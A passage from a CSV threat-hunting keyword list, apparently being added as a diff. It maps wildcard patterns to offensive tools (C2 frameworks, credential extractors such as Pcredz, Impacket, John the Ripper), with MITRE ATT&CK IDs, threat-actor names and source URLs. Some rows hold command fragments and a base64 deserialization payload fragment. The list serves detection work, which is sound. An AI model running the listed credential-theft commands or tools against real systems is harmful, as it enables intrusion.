","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*payload_msf.exe*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*payload_scripts.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" 
+"*payload_scripts/sleepmask*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*payload_section.cpp*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z"
+"*payload_section.hpp*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z"
+"*payload_spellshell.c*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and 
Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"*payload_spellshell.exe*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"*payload_tidy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Payload_Type/freyja/*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z"
+"*PayloadCommsHost*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*--payload-cookie*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z"
+"*Payload-Download-Cradles*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles 
which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z"
+"*PayloadFormat.ASSEMBLY*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*PayloadFormat.DLL*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*PayloadFormat.EXE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*PayloadFormat.POWERSHELL*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*PayloadFormat.SHELLCODE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*PayloadFormat.SVC_EXE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*payloadgenerator.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*payloads/Follina*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - 
T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*payloads/Powershell*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*payloads/shellcodes*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*payloads_examples*calc.js*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*payloads_examples*calc.xll*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*PayloadsAllTheThings*","offensive_tool_keyword","PayloadsAllTheThings","A list of useful payloads and bypasses for Web Application Security. 
Feel free to improve with your payloads and techniques ! ","T1210 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/PayloadsAllTheThings","1","1","N/A","N/A","1","4","4","2019-02-11T06:34:14Z","2019-02-11T06:29:45Z"
+"*PayloadService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*--payload-type Macro*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z"
+"*PayloadType.BIND_PIPE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*PayloadType.EXTERNAL*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*PayloadType.HTTP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - 
T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*PayloadType.REVERSE_TCP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*--payload-url */pwn.html","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z"
+"*pcap_linktypes.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*pcap2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*pcapfile.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*PcapXray*","offensive_tool_keyword","PcapXray","Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.","T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048","TA0001 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Srinivas11789/PcapXray","1","1","N/A","N/A","10","1501","270","2022-03-28T15:31:26Z","2017-10-02T04:47:51Z" +"*pcienlhnoficegnepejpfiklggkioccm*","greyware_tool_keyword","Cloud VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Pcredz -d *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z"
+"*Pcredz -f *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z"
+"*PCredz -f *.pcap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*Pcredz -i *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" +"*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*pdbedit -L -v*","greyware_tool_keyword","pdbedit","Sets the smbpasswd listing format. It will make pdbedit list the users in the database - printing out the account fields in a format compatible with the smbpasswd file format.","T1003.003 - T1087.001","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*pdbedit -L -w*","greyware_tool_keyword","pdbedit","Enables the verbose listing format. 
It causes pdbedit to list the users in the database - printing out the account fields in a descriptive format","T1003.003 - T1087.001","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*PDF_Payload*Doomfist.pdf*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
+"*pdf2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*pdfcrack -f *.pdf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*PDONUT_INSTANCE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*pe_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*pe_packer/dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*pe_packer/exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*pe_packer/main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*pe_packer\dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*pe_packer\exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*pe_packer\main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*pe_packer_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
